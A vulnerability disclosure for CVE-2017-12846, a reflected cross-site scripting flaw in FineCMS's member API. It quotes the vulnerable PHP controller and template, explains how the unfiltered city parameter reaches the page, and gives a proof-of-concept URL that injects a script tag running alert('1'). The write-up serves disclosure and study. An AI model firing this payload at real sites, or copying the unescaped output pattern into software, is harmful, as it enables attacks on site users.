The latest version of finecms unlimited XSS

CVE-2017-12846

the problem is in /finecms/dayrui/controllers/member/api.php

Third-party platforms are invoked here, but the filtering is not strictly enforced.The vulnerability function is as follows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
public function baidumap() {
$list = $this->input->get('city') ? explode(',', urldecode($this->input->get('city'))) : NULL;
$city = isset($list[0]) ? $list[0] : '';
$value = $this->input->get('value');
$value = strlen($value) > 10 ? $value : '';
$this->template->assign(array(
'city' => $city,
'value' => $value,
'list' => $list,
'name' => $this->input->get('name'),
'level' => (int)$this->input->get('level'),
'width' => $this->input->get('width'),
'height' => $this->input->get('height') - 30,
));
$this->template->display('baidumap.html', 'admin');
}

Here we can see$valueand$cityParameters do not open XSS filter,although$valueare limited by a length of 10,The result is that even a short domain name cannot construct an effective XSS,But our $city parameters do not filter effectively,And it is directly assign to the template.
Let’s look at the templatebaidumap.html

1
2
3
4
5
6
7
8
9
<div id="toolbar">
<div class="selCity">
<div class="right">
<a href="javascript:;" class="mark" onClick="addMarker();">{fc_lang('添加标注')}</a>
<a href="javascript:;" onClick="removeMarker();" class="map">{fc_lang('重置地图')}</a>
</div>
<strong id="curCity">{$city}</strong> [<a onClick="mapClose();" id="curCityText" href="javascript:;">{fc_lang('更换城市')}</a>]
</div>

You can see that our $city variable is injected directly into the < strong > label, so we can construct the payload directly

1
2
​http://localhost/index.php?s=member&c=api&m=baidumap&city=<script>alert('1')</script>&value=123


(not just baidumap, the upload and other functions on the back of the page have this situation, the same solution)